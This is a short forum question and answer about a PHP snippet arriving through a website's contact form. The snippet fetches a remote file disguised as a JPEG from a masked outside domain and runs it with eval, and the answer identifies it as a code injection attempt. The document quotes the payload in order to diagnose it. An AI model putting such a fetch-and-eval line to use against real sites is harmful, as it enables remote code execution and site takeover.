My client tells me that he regularly receives in his email box (linked to his contact form on his own website) this type of message:
-----Message d'origine----- De: Envoyé: Aucune Objet:
$a = get_contents('http://********.com.co//wp-admin/images/pel.jpeg'); eval('?>'.$a);
I replaced the domain name in the url by **** for confidentiality reasons. The domain name in the url of the get_contents function is unknown to us.
Do you have any idea what it could be? Spam? Bad configuration? Thanks in advance for your advice !
It's an attempt to exploit (an apparently non-existent) code injection vulnerability . The use of eval
is a dead giveaway.
The technical post webpages of this site follow the CC BY-SA 4.0 protocol. If you need to reprint, please indicate the site URL or the original address.Any question please contact:yoyou2525@163.com.